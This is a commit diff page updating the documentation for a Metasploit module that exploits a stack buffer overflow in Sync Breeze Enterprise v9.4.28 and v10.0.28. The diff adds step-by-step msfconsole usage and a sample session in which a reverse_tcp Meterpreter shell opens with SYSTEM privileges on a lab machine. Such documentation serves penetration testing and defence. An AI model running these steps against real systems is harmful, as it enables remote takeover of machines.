Skip to content

Commit fd0ce33

Browse files
committed
Updated Module Documentation
1 parent ef282ea commit fd0ce33

File tree

1 file changed

+40
-8
lines changed

1 file changed

+40
-8
lines changed

documentation/modules/exploit/windows/http/syncbreeze_bof.md

Lines changed: 40 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
## Vulnerable Application
22

3-
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
3+
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
44

55
## Verification Steps
66
1. Install a vulnerable Sync Breeze Enterprise
@@ -10,13 +10,14 @@
1010
5. Check `Enable Web Server On Port 80` to start the web interface
1111
6. Start `msfconsole`
1212
7. Do `use exploit/windows/http/syncbreeze_bof`
13-
8. Do `set RHOST ip`
14-
9. Do `check`
15-
10. Verify the target is vulnerable
16-
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
17-
12. Do `set LHOST ip`
18-
13. Do `exploit`
19-
14. Verify the Meterpreter session is opened
13+
8. Select appropriate target via `set target 0` or `set target 1`
14+
9. Do `set RHOST ip`
15+
10. Do `check`
16+
11. Verify the target is vulnerable
17+
12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
18+
13. Do `set LHOST ip`
19+
14. Do `exploit`
20+
15. Verify the Meterpreter session is opened
2021

2122
## Scenarios
2223

@@ -72,3 +73,34 @@ Logged On Users : 3
7273
Meterpreter : x86/windows
7374
meterpreter >
7475
```
76+
77+
###Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
78+
79+
```
80+
msf > use exploit/windows/http/syncbreeze_bof
81+
msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
82+
rhost => 192.168.10.61
83+
msf exploit(syncbreeze_bof) > set target 1
84+
target => 1
85+
msf exploit(syncbreeze_bof) > exploit
86+
87+
[*] Started reverse TCP handler on 192.168.10.60:4444
88+
[*] Sending request...
89+
[*] Sending stage (171583 bytes) to 192.168.10.61
90+
[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
91+
[+] negotiating tlv encryption
92+
[+] negotiated tlv encryption
93+
[+] negotiated tlv encryption
94+
95+
meterpreter > getuid
96+
Server username: NT AUTHORITY\SYSTEM
97+
meterpreter > sysinfo
98+
Computer : MUSHROOMKINGDOM
99+
OS : Windows 7 (Build 7600).
100+
Architecture : x86
101+
System Language : en_US
102+
Domain : WORKGROUP
103+
Logged On Users : 2
104+
Meterpreter : x86/windows
105+
meterpreter >
106+
```

0 commit comments

Comments
 (0)